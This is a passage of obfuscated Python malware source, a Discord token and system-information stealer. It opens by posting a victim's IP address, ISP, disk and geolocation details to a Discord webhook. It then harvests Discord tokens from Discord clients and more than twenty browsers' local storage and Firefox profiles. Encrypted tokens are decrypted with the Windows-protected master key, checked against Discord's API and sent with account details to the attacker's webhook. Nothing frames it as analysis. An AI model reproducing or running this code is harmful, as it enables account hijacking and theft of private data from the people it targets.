    embed.add_field(name=":satellite: Ip:", value=f"""```Public : {LJQCZILIGIVNARUXRVEVDSGXZHOEIPEKJTLTKHEHTOWPDFGKDJFHPEKAERZITUTRCQZALJZWH}
Local  : {XGFNYRZJZXCPTPAXUFHVZMFHJUEFYAMILAFJQTBMJJZVJLZNJNXMYJIFGNMUKEVLLWBJGS}
Isp    : {OMVGGCBMCYVAKDOHLUXSNMUTATDCAYKHYTMHUFEUWHYJVLFJTTIMJVYRKJN}
Org    : {ZWNCSMUZJRRBGLIHCHAMMRMPNAOYISJECPPQOWVSLRHPXYGVAMNAC}
As     : {VSXQHILHWLUTLCAMKYKZVVIVMQHHBCVDICTLJLPVLRWUPZKBJUGDMAOCIOYFDHOPFCMTVKJGYZNYOXTGELK}```""", inline=False)

    embed.add_field(name=":minidisc: Disk:", value=f"""```{KHDYHQMFPGYVCZZUJDCACWCDSDMVFSBQTBTOMKCMKIXPRZLMWZILEZGOPUUTVBIUJDKZYAD}```""", inline=False)

    embed.add_field(name=":map: Location:", value=f"""```Country   : {PITPJSPCJIVZYYDNMTBCLBECRSTPKCYXKIYUVIKDBIVKGKPMQRBNGYUGGUVQJRQLKJJUBQVGIENTIEWW} ({PITPJSPCJIVZYYDNMTBCLBECRSTPKCYXKIYUVIKDBIVKGKPMQRBNGYUGGUVQJRQLKJJUBQVGIENTIEWW_code})
Region    : {ZAPQZXEHHULPIJLSUNDZZXHDHVZEKWUWCOXJNDFNFZSCWXNLMFJGBLXUBZLMNYVBCHNPOKWEXZP} ({ZAPQZXEHHULPIJLSUNDZZXHDHVZEKWUWCOXJNDFNFZSCWXNLMFJGBLXUBZLMNYVBCHNPOKWEXZP_code})
Zip       : {CVEPETSPJIYWXAXAPUQFOZBWVHWVLAPRNOTICDXCVDCLBODHSORGJTKTJAPSJ}
City      : {JDCDLWMTWHTYTXYZXGYMIOFPGGFWFIEEMFHWVRJQFNXIOQHRZWKTMYDRAMUYKUNVAWSAOUWFXNNCWBWHYOQBXO}
Timezone  : {OYBAOKBMFTYJONOZJXKCWZOMQCTMAQIQGTWHVMPOWHDXPZWBHYOATXSTUQAAJLWICPFCBWLIYUAKSLLKDAUKPXPFINXQSLSZRJ}
Latitude  : {GGIBDTVSXKFPKYATLNRPNZXZFTXGXIUTEFPGVQLDREUWOTRPFUHGMMOARXOWGFAVSKHPDZEROUUTFSZORNN}
Longitude : {QXTUJIURPJALVHIBMTRPZYRASPSIIPUCCVNFHZHFYYAXWVHMOZXRXHALULEZWAKXIHZLCHWCG}```""", inline=False)

    embed.set_footer(text=NBDPMWIGZSQUQVDUQFLEXGMFSAOIMQPTDPVPFOYDNQXAVNCDRDTDGKYGE, icon_url=YAVPMDIHZKFPITSPDHJWAXISAFMROMVXKOAVHHJXUNIMDAXMFDQTRXQSJYLACNPXZAQLHJQWTQ)

    w3bh00k = SyncWebhook.from_url(COFKNPMTPGIKKBAIQORAXHJSSLQJRBIPMSVNXJVMZFDTKEASGWOU)
    w3bh00k.send(embed=embed, username=UNGUFADWIYHPZLYYNUMZOXZFGLFTBHNTFZVGAPJCFLCWOSGOJLOCVXCSVWTGKYIQYJBKAKPTO, avatar_url=YAVPMDIHZKFPITSPDHJWAXISAFMROMVXKOAVHHJXUNIMDAXMFDQTRXQSJYLACNPXZAQLHJQWTQ)

def Di5c0rd_T0k3n():
    import os
    import re
    import json
    import base64
    import requests
    from Cryptodome.Cipher import AES
    from Cryptodome.Protocol.KDF import scrypt
    from win32crypt import CryptUnprotectData
    from discord import SyncWebhook, Embed

    def extr4ct_t0k3n5():
        OIGHOIKOYIESOIQCENHACHESZVUSGRTALYKDLSOXWQPPLDEHJWXKGLFSVXWXTCGGCQIKRJU = "https://discord.com/api/v9/users/@me"
        KRKUQHBARAJHTCJJFPAHEWSYENWRDRMNSIOEYCHTGLLKFOUQPCQOXQWRPDVHGVXNFSHCCDWKUVSYDDSYFJPZLRGDTZDHLUKDJCFG = os.getenv("localappdata")
        JDMVAFPONZNHNODWMFQGUTVYNPIBGEYSOPOVRELKVEPJOZNKXLOEFFBACKQKXULHTIPREISTDRGQMWVRORKVILWNTEIELU = os.getenv("appdata")
        KNHXDXMOIBXMHIXKPUXKCVSFMHBGNSJBCCHJQUJVMUDMDUTKQLABKPIXSDYCORHUQXFAZLQZRARRHOYDGFHXDIZMLOWJQMT = r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}"
        KNHXDXMOIBXMHIXKPUXKCVSFMHBGNSJBCCHJQUJVMUDMDUTKQLABKPIXSDYCORHUQXFAZLQZRARRHOYDGFHXDIZMLOWJQMT_enc = r"dQw4w9WgXcQ:[^\"]*"
        SSYABZXGIXOXTBWUHAWTOKIFYIAYQPNVWNCFWUASJUHKYHQKWYBAJKCLHKGNCQRDJBANKAXHUKFXWJCWIHTZMITTWAKKK = []
        YHRDWAUEBTHLBGZOEADDOHQKOUKBVXZHCAOBVPARXAQAROYIKVGP = []
        OYJJPBOVJHIMHQZKOHCEUGIHJLAIJWKLVIAAWDAKSDIADZKLSQTZCHHMMP = {}

        WIUREKEPHSRHXBYUADZMLSGYZZEHGDXJMDCVPVYEXVDKJGJVLXAMLGYONF = {
            'Discord': JDMVAFPONZNHNODWMFQGUTVYNPIBGEYSOPOVRELKVEPJOZNKXLOEFFBACKQKXULHTIPREISTDRGQMWVRORKVILWNTEIELU + '\\discord\\Local Storage\\leveldb\\',
            'Discord Canary': JDMVAFPONZNHNODWMFQGUTVYNPIBGEYSOPOVRELKVEPJOZNKXLOEFFBACKQKXULHTIPREISTDRGQMWVRORKVILWNTEIELU + '\\discordcanary\\Local Storage\\leveldb\\',
            'Lightcord': JDMVAFPONZNHNODWMFQGUTVYNPIBGEYSOPOVRELKVEPJOZNKXLOEFFBACKQKXULHTIPREISTDRGQMWVRORKVILWNTEIELU + '\\Lightcord\\Local Storage\\leveldb\\',
            'Discord PTB': JDMVAFPONZNHNODWMFQGUTVYNPIBGEYSOPOVRELKVEPJOZNKXLOEFFBACKQKXULHTIPREISTDRGQMWVRORKVILWNTEIELU + '\\discordptb\\Local Storage\\leveldb\\',
            'Opera': JDMVAFPONZNHNODWMFQGUTVYNPIBGEYSOPOVRELKVEPJOZNKXLOEFFBACKQKXULHTIPREISTDRGQMWVRORKVILWNTEIELU + '\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\',
            'Opera GX': JDMVAFPONZNHNODWMFQGUTVYNPIBGEYSOPOVRELKVEPJOZNKXLOEFFBACKQKXULHTIPREISTDRGQMWVRORKVILWNTEIELU + '\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\',
            'Amigo': KRKUQHBARAJHTCJJFPAHEWSYENWRDRMNSIOEYCHTGLLKFOUQPCQOXQWRPDVHGVXNFSHCCDWKUVSYDDSYFJPZLRGDTZDHLUKDJCFG + '\\Amigo\\User Data\\Local Storage\\leveldb\\',
            'Torch': KRKUQHBARAJHTCJJFPAHEWSYENWRDRMNSIOEYCHTGLLKFOUQPCQOXQWRPDVHGVXNFSHCCDWKUVSYDDSYFJPZLRGDTZDHLUKDJCFG + '\\Torch\\User Data\\Local Storage\\leveldb\\',
            'Kometa': KRKUQHBARAJHTCJJFPAHEWSYENWRDRMNSIOEYCHTGLLKFOUQPCQOXQWRPDVHGVXNFSHCCDWKUVSYDDSYFJPZLRGDTZDHLUKDJCFG + '\\Kometa\\User Data\\Local Storage\\leveldb\\',
            'Orbitum': KRKUQHBARAJHTCJJFPAHEWSYENWRDRMNSIOEYCHTGLLKFOUQPCQOXQWRPDVHGVXNFSHCCDWKUVSYDDSYFJPZLRGDTZDHLUKDJCFG + '\\Orbitum\\User Data\\Local Storage\\leveldb\\',
            'CentBrowser': KRKUQHBARAJHTCJJFPAHEWSYENWRDRMNSIOEYCHTGLLKFOUQPCQOXQWRPDVHGVXNFSHCCDWKUVSYDDSYFJPZLRGDTZDHLUKDJCFG + '\\CentBrowser\\User Data\\Local Storage\\leveldb\\',
            '7Star': KRKUQHBARAJHTCJJFPAHEWSYENWRDRMNSIOEYCHTGLLKFOUQPCQOXQWRPDVHGVXNFSHCCDWKUVSYDDSYFJPZLRGDTZDHLUKDJCFG + '\\7Star\\7Star\\User Data\\Local Storage\\leveldb\\',
            'Sputnik': KRKUQHBARAJHTCJJFPAHEWSYENWRDRMNSIOEYCHTGLLKFOUQPCQOXQWRPDVHGVXNFSHCCDWKUVSYDDSYFJPZLRGDTZDHLUKDJCFG + '\\Sputnik\\Sputnik\\User Data\\Local Storage\\leveldb\\',
            'Vivaldi': KRKUQHBARAJHTCJJFPAHEWSYENWRDRMNSIOEYCHTGLLKFOUQPCQOXQWRPDVHGVXNFSHCCDWKUVSYDDSYFJPZLRGDTZDHLUKDJCFG + '\\Vivaldi\\User Data\\Default\\Local Storage\\leveldb\\',
            'Google Chrome SxS': KRKUQHBARAJHTCJJFPAHEWSYENWRDRMNSIOEYCHTGLLKFOUQPCQOXQWRPDVHGVXNFSHCCDWKUVSYDDSYFJPZLRGDTZDHLUKDJCFG + '\\Google\\Chrome SxS\\User Data\\Local Storage\\leveldb\\',
            'Google Chrome': KRKUQHBARAJHTCJJFPAHEWSYENWRDRMNSIOEYCHTGLLKFOUQPCQOXQWRPDVHGVXNFSHCCDWKUVSYDDSYFJPZLRGDTZDHLUKDJCFG + '\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\',
            'Google Chrome1': KRKUQHBARAJHTCJJFPAHEWSYENWRDRMNSIOEYCHTGLLKFOUQPCQOXQWRPDVHGVXNFSHCCDWKUVSYDDSYFJPZLRGDTZDHLUKDJCFG + '\\Google\\Chrome\\User Data\\Profile 1\\Local Storage\\leveldb\\',
            'Google Chrome2': KRKUQHBARAJHTCJJFPAHEWSYENWRDRMNSIOEYCHTGLLKFOUQPCQOXQWRPDVHGVXNFSHCCDWKUVSYDDSYFJPZLRGDTZDHLUKDJCFG + '\\Google\\Chrome\\User Data\\Profile 2\\Local Storage\\leveldb\\',
            'Google Chrome3': KRKUQHBARAJHTCJJFPAHEWSYENWRDRMNSIOEYCHTGLLKFOUQPCQOXQWRPDVHGVXNFSHCCDWKUVSYDDSYFJPZLRGDTZDHLUKDJCFG + '\\Google\\Chrome\\User Data\\Profile 3\\Local Storage\\leveldb\\',
            'Google Chrome4': KRKUQHBARAJHTCJJFPAHEWSYENWRDRMNSIOEYCHTGLLKFOUQPCQOXQWRPDVHGVXNFSHCCDWKUVSYDDSYFJPZLRGDTZDHLUKDJCFG + '\\Google\\Chrome\\User Data\\Profile 4\\Local Storage\\leveldb\\',
            'Google Chrome5': KRKUQHBARAJHTCJJFPAHEWSYENWRDRMNSIOEYCHTGLLKFOUQPCQOXQWRPDVHGVXNFSHCCDWKUVSYDDSYFJPZLRGDTZDHLUKDJCFG + '\\Google\\Chrome\\User Data\\Profile 5\\Local Storage\\leveldb\\',
            'Epic Privacy Browser': KRKUQHBARAJHTCJJFPAHEWSYENWRDRMNSIOEYCHTGLLKFOUQPCQOXQWRPDVHGVXNFSHCCDWKUVSYDDSYFJPZLRGDTZDHLUKDJCFG + '\\Epic Privacy Browser\\User Data\\Local Storage\\leveldb\\',
            'Microsoft Edge': KRKUQHBARAJHTCJJFPAHEWSYENWRDRMNSIOEYCHTGLLKFOUQPCQOXQWRPDVHGVXNFSHCCDWKUVSYDDSYFJPZLRGDTZDHLUKDJCFG + '\\Microsoft\\Edge\\User Data\\Default\\Local Storage\\leveldb\\',
            'Uran': KRKUQHBARAJHTCJJFPAHEWSYENWRDRMNSIOEYCHTGLLKFOUQPCQOXQWRPDVHGVXNFSHCCDWKUVSYDDSYFJPZLRGDTZDHLUKDJCFG + '\\uCozMedia\\Uran\\User Data\\Default\\Local Storage\\leveldb\\',
            'Yandex': KRKUQHBARAJHTCJJFPAHEWSYENWRDRMNSIOEYCHTGLLKFOUQPCQOXQWRPDVHGVXNFSHCCDWKUVSYDDSYFJPZLRGDTZDHLUKDJCFG + '\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\',
            'Brave': KRKUQHBARAJHTCJJFPAHEWSYENWRDRMNSIOEYCHTGLLKFOUQPCQOXQWRPDVHGVXNFSHCCDWKUVSYDDSYFJPZLRGDTZDHLUKDJCFG + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\',
            'Iridium': KRKUQHBARAJHTCJJFPAHEWSYENWRDRMNSIOEYCHTGLLKFOUQPCQOXQWRPDVHGVXNFSHCCDWKUVSYDDSYFJPZLRGDTZDHLUKDJCFG + '\\Iridium\\User Data\\Default\\Local Storage\\leveldb\\'
        }

        for WPCTXDUYUKRKCNMDWFWTZAWBFEKPOFXKLXTGGOQHDJAEDKJTPFJ, BOIENVBERFKCJMIFBWAHQYILMOQSUXEGMMTEPAWIGLKWRBIAWQDEKGPUNJMK in WIUREKEPHSRHXBYUADZMLSGYZZEHGDXJMDCVPVYEXVDKJGJVLXAMLGYONF.items():
            if not os.path.exists(BOIENVBERFKCJMIFBWAHQYILMOQSUXEGMMTEPAWIGLKWRBIAWQDEKGPUNJMK):
                continue
            FTEVSYEBDQVYOIYQFUETLMQRLLIMHNXQZMUFJRGOUOUSSVDBOEXHKSWELSNFQPH = WPCTXDUYUKRKCNMDWFWTZAWBFEKPOFXKLXTGGOQHDJAEDKJTPFJ.replace(" ", "").lower()
            if "cord" in BOIENVBERFKCJMIFBWAHQYILMOQSUXEGMMTEPAWIGLKWRBIAWQDEKGPUNJMK:
                if not os.path.exists(JDMVAFPONZNHNODWMFQGUTVYNPIBGEYSOPOVRELKVEPJOZNKXLOEFFBACKQKXULHTIPREISTDRGQMWVRORKVILWNTEIELU + f'\\{FTEVSYEBDQVYOIYQFUETLMQRLLIMHNXQZMUFJRGOUOUSSVDBOEXHKSWELSNFQPH}\\Local State'):
                    continue
                for v4r_file_name in os.listdir(BOIENVBERFKCJMIFBWAHQYILMOQSUXEGMMTEPAWIGLKWRBIAWQDEKGPUNJMK):
                    if v4r_file_name[-3:] not in ["log", "ldb"]:
                        continue
                    with open(f'{BOIENVBERFKCJMIFBWAHQYILMOQSUXEGMMTEPAWIGLKWRBIAWQDEKGPUNJMK}\\{v4r_file_name}', errors='ignore') as v4r_file:
                        for v4r_line in v4r_file:
                            for y in re.findall(KNHXDXMOIBXMHIXKPUXKCVSFMHBGNSJBCCHJQUJVMUDMDUTKQLABKPIXSDYCORHUQXFAZLQZRARRHOYDGFHXDIZMLOWJQMT_enc, v4r_line.strip()):
                                UAUUROBFLYIMJRVSRRQQSWVHRUFCINXTHSCEGVGEJGPDQVFPCMPYDQJCWTGGVRJPSCINTC = decrypt_val(base64.b64decode(y.split('dQw4w9WgXcQ:')[1]), get_master_key(JDMVAFPONZNHNODWMFQGUTVYNPIBGEYSOPOVRELKVEPJOZNKXLOEFFBACKQKXULHTIPREISTDRGQMWVRORKVILWNTEIELU + f'\\{FTEVSYEBDQVYOIYQFUETLMQRLLIMHNXQZMUFJRGOUOUSSVDBOEXHKSWELSNFQPH}\\Local State'))
                                if validate_t0k3n(UAUUROBFLYIMJRVSRRQQSWVHRUFCINXTHSCEGVGEJGPDQVFPCMPYDQJCWTGGVRJPSCINTC, OIGHOIKOYIESOIQCENHACHESZVUSGRTALYKDLSOXWQPPLDEHJWXKGLFSVXWXTCGGCQIKRJU):
                                    IKOUHLFIWFPAMOGVXUTZNEYOUMBFVORAGBFMPYGXXJDGJXRBEYGOAAWHO = requests.get(OIGHOIKOYIESOIQCENHACHESZVUSGRTALYKDLSOXWQPPLDEHJWXKGLFSVXWXTCGGCQIKRJU, headers={'Authorization': UAUUROBFLYIMJRVSRRQQSWVHRUFCINXTHSCEGVGEJGPDQVFPCMPYDQJCWTGGVRJPSCINTC}).json()['id']
                                    if IKOUHLFIWFPAMOGVXUTZNEYOUMBFVORAGBFMPYGXXJDGJXRBEYGOAAWHO not in YHRDWAUEBTHLBGZOEADDOHQKOUKBVXZHCAOBVPARXAQAROYIKVGP:
                                        SSYABZXGIXOXTBWUHAWTOKIFYIAYQPNVWNCFWUASJUHKYHQKWYBAJKCLHKGNCQRDJBANKAXHUKFXWJCWIHTZMITTWAKKK.append(UAUUROBFLYIMJRVSRRQQSWVHRUFCINXTHSCEGVGEJGPDQVFPCMPYDQJCWTGGVRJPSCINTC)
                                        YHRDWAUEBTHLBGZOEADDOHQKOUKBVXZHCAOBVPARXAQAROYIKVGP.append(IKOUHLFIWFPAMOGVXUTZNEYOUMBFVORAGBFMPYGXXJDGJXRBEYGOAAWHO)
                                        OYJJPBOVJHIMHQZKOHCEUGIHJLAIJWKLVIAAWDAKSDIADZKLSQTZCHHMMP[UAUUROBFLYIMJRVSRRQQSWVHRUFCINXTHSCEGVGEJGPDQVFPCMPYDQJCWTGGVRJPSCINTC] = (WPCTXDUYUKRKCNMDWFWTZAWBFEKPOFXKLXTGGOQHDJAEDKJTPFJ, f"{BOIENVBERFKCJMIFBWAHQYILMOQSUXEGMMTEPAWIGLKWRBIAWQDEKGPUNJMK}\\{v4r_file_name}")
            else:
                for v4r_file_name in os.listdir(BOIENVBERFKCJMIFBWAHQYILMOQSUXEGMMTEPAWIGLKWRBIAWQDEKGPUNJMK):
                    if v4r_file_name[-3:] not in ["log", "ldb"]:
                        continue
                    with open(f'{BOIENVBERFKCJMIFBWAHQYILMOQSUXEGMMTEPAWIGLKWRBIAWQDEKGPUNJMK}\\{v4r_file_name}', errors='ignore') as v4r_file:
                        for v4r_line in v4r_file:
                            for UAUUROBFLYIMJRVSRRQQSWVHRUFCINXTHSCEGVGEJGPDQVFPCMPYDQJCWTGGVRJPSCINTC in re.findall(KNHXDXMOIBXMHIXKPUXKCVSFMHBGNSJBCCHJQUJVMUDMDUTKQLABKPIXSDYCORHUQXFAZLQZRARRHOYDGFHXDIZMLOWJQMT, v4r_line.strip()):
                                if validate_t0k3n(UAUUROBFLYIMJRVSRRQQSWVHRUFCINXTHSCEGVGEJGPDQVFPCMPYDQJCWTGGVRJPSCINTC, OIGHOIKOYIESOIQCENHACHESZVUSGRTALYKDLSOXWQPPLDEHJWXKGLFSVXWXTCGGCQIKRJU):
                                    IKOUHLFIWFPAMOGVXUTZNEYOUMBFVORAGBFMPYGXXJDGJXRBEYGOAAWHO = requests.get(OIGHOIKOYIESOIQCENHACHESZVUSGRTALYKDLSOXWQPPLDEHJWXKGLFSVXWXTCGGCQIKRJU, headers={'Authorization': UAUUROBFLYIMJRVSRRQQSWVHRUFCINXTHSCEGVGEJGPDQVFPCMPYDQJCWTGGVRJPSCINTC}).json()['id']
                                    if IKOUHLFIWFPAMOGVXUTZNEYOUMBFVORAGBFMPYGXXJDGJXRBEYGOAAWHO not in YHRDWAUEBTHLBGZOEADDOHQKOUKBVXZHCAOBVPARXAQAROYIKVGP:
                                        SSYABZXGIXOXTBWUHAWTOKIFYIAYQPNVWNCFWUASJUHKYHQKWYBAJKCLHKGNCQRDJBANKAXHUKFXWJCWIHTZMITTWAKKK.append(UAUUROBFLYIMJRVSRRQQSWVHRUFCINXTHSCEGVGEJGPDQVFPCMPYDQJCWTGGVRJPSCINTC)
                                        YHRDWAUEBTHLBGZOEADDOHQKOUKBVXZHCAOBVPARXAQAROYIKVGP.append(IKOUHLFIWFPAMOGVXUTZNEYOUMBFVORAGBFMPYGXXJDGJXRBEYGOAAWHO)
                                        OYJJPBOVJHIMHQZKOHCEUGIHJLAIJWKLVIAAWDAKSDIADZKLSQTZCHHMMP[UAUUROBFLYIMJRVSRRQQSWVHRUFCINXTHSCEGVGEJGPDQVFPCMPYDQJCWTGGVRJPSCINTC] = (WPCTXDUYUKRKCNMDWFWTZAWBFEKPOFXKLXTGGOQHDJAEDKJTPFJ, f"{BOIENVBERFKCJMIFBWAHQYILMOQSUXEGMMTEPAWIGLKWRBIAWQDEKGPUNJMK}\\{v4r_file_name}")

        if os.path.exists(JDMVAFPONZNHNODWMFQGUTVYNPIBGEYSOPOVRELKVEPJOZNKXLOEFFBACKQKXULHTIPREISTDRGQMWVRORKVILWNTEIELU + "\\Mozilla\\Firefox\\Profiles"):
            for BOIENVBERFKCJMIFBWAHQYILMOQSUXEGMMTEPAWIGLKWRBIAWQDEKGPUNJMK, _, v4r_files in os.walk(JDMVAFPONZNHNODWMFQGUTVYNPIBGEYSOPOVRELKVEPJOZNKXLOEFFBACKQKXULHTIPREISTDRGQMWVRORKVILWNTEIELU + "\\Mozilla\\Firefox\\Profiles"):
                for v4r__file in v4r_files:
                    if v4r__file.endswith('.sqlite'):
                        with open(f'{BOIENVBERFKCJMIFBWAHQYILMOQSUXEGMMTEPAWIGLKWRBIAWQDEKGPUNJMK}\\{v4r__file}', errors='ignore') as v4r_file:
                            for v4r_line in v4r_file:
                                for UAUUROBFLYIMJRVSRRQQSWVHRUFCINXTHSCEGVGEJGPDQVFPCMPYDQJCWTGGVRJPSCINTC in re.findall(KNHXDXMOIBXMHIXKPUXKCVSFMHBGNSJBCCHJQUJVMUDMDUTKQLABKPIXSDYCORHUQXFAZLQZRARRHOYDGFHXDIZMLOWJQMT, v4r_line.strip()):
                                    if validate_t0k3n(UAUUROBFLYIMJRVSRRQQSWVHRUFCINXTHSCEGVGEJGPDQVFPCMPYDQJCWTGGVRJPSCINTC, OIGHOIKOYIESOIQCENHACHESZVUSGRTALYKDLSOXWQPPLDEHJWXKGLFSVXWXTCGGCQIKRJU):
                                        IKOUHLFIWFPAMOGVXUTZNEYOUMBFVORAGBFMPYGXXJDGJXRBEYGOAAWHO = requests.get(OIGHOIKOYIESOIQCENHACHESZVUSGRTALYKDLSOXWQPPLDEHJWXKGLFSVXWXTCGGCQIKRJU, headers={'Authorization': UAUUROBFLYIMJRVSRRQQSWVHRUFCINXTHSCEGVGEJGPDQVFPCMPYDQJCWTGGVRJPSCINTC}).json()['id']
                                        if IKOUHLFIWFPAMOGVXUTZNEYOUMBFVORAGBFMPYGXXJDGJXRBEYGOAAWHO not in YHRDWAUEBTHLBGZOEADDOHQKOUKBVXZHCAOBVPARXAQAROYIKVGP:
                                            SSYABZXGIXOXTBWUHAWTOKIFYIAYQPNVWNCFWUASJUHKYHQKWYBAJKCLHKGNCQRDJBANKAXHUKFXWJCWIHTZMITTWAKKK.append(UAUUROBFLYIMJRVSRRQQSWVHRUFCINXTHSCEGVGEJGPDQVFPCMPYDQJCWTGGVRJPSCINTC)
                                            YHRDWAUEBTHLBGZOEADDOHQKOUKBVXZHCAOBVPARXAQAROYIKVGP.append(IKOUHLFIWFPAMOGVXUTZNEYOUMBFVORAGBFMPYGXXJDGJXRBEYGOAAWHO)
                                            OYJJPBOVJHIMHQZKOHCEUGIHJLAIJWKLVIAAWDAKSDIADZKLSQTZCHHMMP[UAUUROBFLYIMJRVSRRQQSWVHRUFCINXTHSCEGVGEJGPDQVFPCMPYDQJCWTGGVRJPSCINTC] = ('Firefox', f"{BOIENVBERFKCJMIFBWAHQYILMOQSUXEGMMTEPAWIGLKWRBIAWQDEKGPUNJMK}\\{v4r__file}")
        return SSYABZXGIXOXTBWUHAWTOKIFYIAYQPNVWNCFWUASJUHKYHQKWYBAJKCLHKGNCQRDJBANKAXHUKFXWJCWIHTZMITTWAKKK, OYJJPBOVJHIMHQZKOHCEUGIHJLAIJWKLVIAAWDAKSDIADZKLSQTZCHHMMP

    def validate_t0k3n(UAUUROBFLYIMJRVSRRQQSWVHRUFCINXTHSCEGVGEJGPDQVFPCMPYDQJCWTGGVRJPSCINTC, OIGHOIKOYIESOIQCENHACHESZVUSGRTALYKDLSOXWQPPLDEHJWXKGLFSVXWXTCGGCQIKRJU):
        return requests.get(OIGHOIKOYIESOIQCENHACHESZVUSGRTALYKDLSOXWQPPLDEHJWXKGLFSVXWXTCGGCQIKRJU, headers={'Authorization': UAUUROBFLYIMJRVSRRQQSWVHRUFCINXTHSCEGVGEJGPDQVFPCMPYDQJCWTGGVRJPSCINTC}).status_code == 200

    def decrypt_val(SJJXNDCHJLTNUMRKPJKUHJXROLKUYIPGPOECNIAMJDIZPOCJYOPSFGXBRAEYWSYVJDAUUSKPDHTQWXHQGRKORTQUNHUKFS, v4r_master_key):
        v4r_iv = SJJXNDCHJLTNUMRKPJKUHJXROLKUYIPGPOECNIAMJDIZPOCJYOPSFGXBRAEYWSYVJDAUUSKPDHTQWXHQGRKORTQUNHUKFS[3:15]
        v4r_payload = SJJXNDCHJLTNUMRKPJKUHJXROLKUYIPGPOECNIAMJDIZPOCJYOPSFGXBRAEYWSYVJDAUUSKPDHTQWXHQGRKORTQUNHUKFS[15:]
        v4r_cipher = AES.new(v4r_master_key, AES.MODE_GCM, v4r_iv)
        return v4r_cipher.decrypt(v4r_payload)[:-16].decode()

    def get_master_key(BOIENVBERFKCJMIFBWAHQYILMOQSUXEGMMTEPAWIGLKWRBIAWQDEKGPUNJMK):
        if not os.path.exists(BOIENVBERFKCJMIFBWAHQYILMOQSUXEGMMTEPAWIGLKWRBIAWQDEKGPUNJMK):
            return None
        with open(BOIENVBERFKCJMIFBWAHQYILMOQSUXEGMMTEPAWIGLKWRBIAWQDEKGPUNJMK, "r", encoding="utf-8") as v4r_f:
            v4r_local_state = json.load(v4r_f)
        v4r_master_key = base64.b64decode(v4r_local_state["os_crypt"]["encrypted_key"])[5:]
        return CryptUnprotectData(v4r_master_key, None, None, None, 0)[1]

    def upload_t0k3n5():
        SSYABZXGIXOXTBWUHAWTOKIFYIAYQPNVWNCFWUASJUHKYHQKWYBAJKCLHKGNCQRDJBANKAXHUKFXWJCWIHTZMITTWAKKK, OYJJPBOVJHIMHQZKOHCEUGIHJLAIJWKLVIAAWDAKSDIADZKLSQTZCHHMMP = extr4ct_t0k3n5()
        PWYOJHUYZGBMJBXTVFCFNPUTUTBZEIBBULPCFVUKBZOEXPRNURXLUEBTSJYUGUTPXTYKJQ = SyncWebhook.from_url(COFKNPMTPGIKKBAIQORAXHJSSLQJRBIPMSVNXJVMZFDTKEASGWOU)

        if not SSYABZXGIXOXTBWUHAWTOKIFYIAYQPNVWNCFWUASJUHKYHQKWYBAJKCLHKGNCQRDJBANKAXHUKFXWJCWIHTZMITTWAKKK:
            PFPEAKANSKXPAXTUCRUJIHNOFBMXBDXLHAMASCOZSHWPNMUBHCRMRAJFCYLHELDPESCFPLMHOSWTIMOXKOKCWKVODNQO = Embed(
                title=f'Discord Token `{KNOWQKBOFAQLEGHDKFNMKEVGLJKAHRLDOSTBUHWIXBKBCRZXGOXRMZWNRPQBZU} "{LJQCZILIGIVNARUXRVEVDSGXZHOEIPEKJTLTKHEHTOWPDFGKDJFHPEKAERZITUTRCQZALJZWH}"`:', 
                description=f"No discord tokens found.",
                color=BDFLBKPPAYCEVJQPWDIWXNXQUNECVISUTKVOYQCDWYOBEGMWZFQDCETZCYLEXDATKFHPTLDCMSBLZSTHFPCWDMRO)
            PFPEAKANSKXPAXTUCRUJIHNOFBMXBDXLHAMASCOZSHWPNMUBHCRMRAJFCYLHELDPESCFPLMHOSWTIMOXKOKCWKVODNQO.set_footer(text=NBDPMWIGZSQUQVDUQFLEXGMFSAOIMQPTDPVPFOYDNQXAVNCDRDTDGKYGE, icon_url=YAVPMDIHZKFPITSPDHJWAXISAFMROMVXKOAVHHJXUNIMDAXMFDQTRXQSJYLACNPXZAQLHJQWTQ)
            PWYOJHUYZGBMJBXTVFCFNPUTUTBZEIBBULPCFVUKBZOEXPRNURXLUEBTSJYUGUTPXTYKJQ.send(embed=PFPEAKANSKXPAXTUCRUJIHNOFBMXBDXLHAMASCOZSHWPNMUBHCRMRAJFCYLHELDPESCFPLMHOSWTIMOXKOKCWKVODNQO, username=UNGUFADWIYHPZLYYNUMZOXZFGLFTBHNTFZVGAPJCFLCWOSGOJLOCVXCSVWTGKYIQYJBKAKPTO, avatar_url=YAVPMDIHZKFPITSPDHJWAXISAFMROMVXKOAVHHJXUNIMDAXMFDQTRXQSJYLACNPXZAQLHJQWTQ)
            return
        
        for UAUUROBFLYIMJRVSRRQQSWVHRUFCINXTHSCEGVGEJGPDQVFPCMPYDQJCWTGGVRJPSCINTC_d15c0rd in SSYABZXGIXOXTBWUHAWTOKIFYIAYQPNVWNCFWUASJUHKYHQKWYBAJKCLHKGNCQRDJBANKAXHUKFXWJCWIHTZMITTWAKKK:
            INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR = requests.get('https://discord.com/api/v8/users/@me', headers={'Authorization': UAUUROBFLYIMJRVSRRQQSWVHRUFCINXTHSCEGVGEJGPDQVFPCMPYDQJCWTGGVRJPSCINTC_d15c0rd}).json()

            YTTKIXVYKFTHQKNEGYTEJCSITQTVYHBGURYGDHALVURSWNONNFLEBCGUGXBDCUQKQRDSAMUGHLZLZMYEVHLRWEUM = INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('username', "None") + '#' + INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('discriminator', "None")
            BWFFVFBOHDPSVOEVKWSLSGXGLKXXOSKKZPEYDWKMKKZDJTFRADDQYRAFQI = INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('global_name', "None")
            GYXJAJMKGYOPNWPXMLZHFVDAIFRMMFOWVCADXFTMTAXKQKNPBLEYXWBYADEPTCCZUW = INRJUMQSQMLZKRFFFHUTZRCKTIPBVNKGIXEMTILXPVTLNZOXMUSINKMR.get('id', "None")
